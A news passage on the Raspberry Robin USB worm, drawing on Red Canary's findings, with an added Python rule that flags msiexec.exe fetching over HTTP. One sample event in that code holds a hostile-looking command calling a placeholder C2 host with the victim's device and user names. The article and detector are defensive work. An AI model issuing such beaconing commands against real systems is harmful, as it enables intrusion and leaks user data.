According to Red Canary Intelligence, the malware has been visible since last fall and researchers with the company have been tracking it since then. What began as detections in a small subset of customers has since grown across many more. If an infected USB drive is inserted into a Windows machine, the worm can spread on that system, using msiexec.exe to contact its operators’ infrastructure and transmit details about the victim’s user and device: “This activity cluster relies on msiexec.exe to call out to its infrastructure, often compromised QNAP devices, using HTTP requests that contain a victim’s user and device names. We also observed Raspberry Robin use TOR exit nodes as additional command and control (C2) infrastructure.”
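The behaviour quoted above gives defenders a concrete thing to look for: msiexec.exe, a legitimate Windows installer binary, fetching over HTTP from a remote host with the victim's device and user names in the request. The following Python is an added example, not code from the article or from Red Canary; it runs a simple hunting rule over a few constructed process-creation records. The record fields (host, user, image, cmdline), the URL layout and the port in the sample are assumptions for illustration, not observed indicators from the write-up.

```python
"""Flag msiexec.exe process-creation events that fetch over HTTP and embed
the victim's host or user name in the URL.

Added example; the event schema and sample values below are constructed and
are not indicators taken from the Red Canary report.
"""
import re
from urllib.parse import urlparse

# Constructed sample events. Event 0 is a routine install from an internal
# share; event 1 has the shape the article describes (HTTP fetch carrying the
# victim's device and user names); event 2 is unrelated.
SAMPLE_EVENTS = [
    {"host": "WS-0142", "user": "jdoe",
     "image": "C:\\Windows\\System32\\msiexec.exe",
     "cmdline": "msiexec.exe /i \\\\fileserver\\installers\\app.msi /qn"},
    {"host": "WS-0142", "user": "jdoe",
     "image": "C:\\Windows\\System32\\msiexec.exe",
     "cmdline": "msiexec.exe /q /i http://c2-placeholder.test:8080/WS-0142=jdoe"},
    {"host": "WS-0201", "user": "asmith",
     "image": "C:\\Windows\\explorer.exe",
     "cmdline": "explorer.exe"},
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def suspicious_msiexec(event):
    """Return the list of reasons an event matches the described beaconing, or [] if none."""
    reasons = []
    if not event["image"].lower().endswith("\\msiexec.exe"):
        return reasons
    match = URL_RE.search(event["cmdline"])
    if not match:
        return reasons  # local or UNC package path: normal installer use
    reasons.append("msiexec.exe fetching a package over HTTP(S)")
    parsed = urlparse(match.group(0))
    # A non-standard port is only a weak extra signal (assumption, not from the page).
    if parsed.port and parsed.port not in (80, 443):
        reasons.append(f"non-standard port {parsed.port}")
    # The article states the requests carry the victim's user and device names,
    # so check whether either appears in the path or query string.
    tail = (parsed.path + "?" + parsed.query).lower()
    if event["host"].lower() in tail:
        reasons.append("victim device name embedded in URL")
    if event["user"].lower() in tail:
        reasons.append("victim user name embedded in URL")
    return reasons


def scan(events):
    """Apply the rule to every event and return (host, user, reasons) for each hit."""
    hits = []
    for event in events:
        reasons = suspicious_msiexec(event)
        if reasons:
            hits.append((event["host"], event["user"], reasons))
    return hits


if __name__ == "__main__":
    for host, user, reasons in scan(SAMPLE_EVENTS):
        print(f"{host}\\{user}: " + "; ".join(reasons))
```

In practice the same rule would be expressed in the EDR or SIEM query language over real process-creation telemetry; the point of the Python is that a benign msiexec.exe invocation (local or UNC package) produces no hit, while the remote HTTP fetch with identifying data in the URL produces several independent reasons that can be weighted separately.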
Intelligence Gaps
The research team says activity around the Raspberry Robin malware has been ramping up since the turn of the year. While it has been possible to see how the malware infiltrates a system, there are still some aspects of an attack that researchers are not clear about. For example, Red Canary still does not know how Raspberry Robin infects the external drives, simply putting it down to a potential offline infection “outside of our visibility”. Moreover, the team is uncertain about how the worm installs the malicious DLL on a Windows system. “We have several intelligence gaps around this cluster, including the operators’ objectives. While we don’t yet have the full picture, we want to share what we know about this activity cluster so far to enrich collective understanding of this threat and empower defenders to identify this activity.” You can check out the technical details in the full write-up from Red Canary Intelligence.
Tip of the day
Did you know that your data and privacy might be at risk if you run Windows without encryption? A bootable USB with a live Linux distribution is often enough to gain access to all of your files. If you want to change that, check out our detailed BitLocker guide, where we show you how to turn on encryption for your system disk or any other drive you might be using in your computer.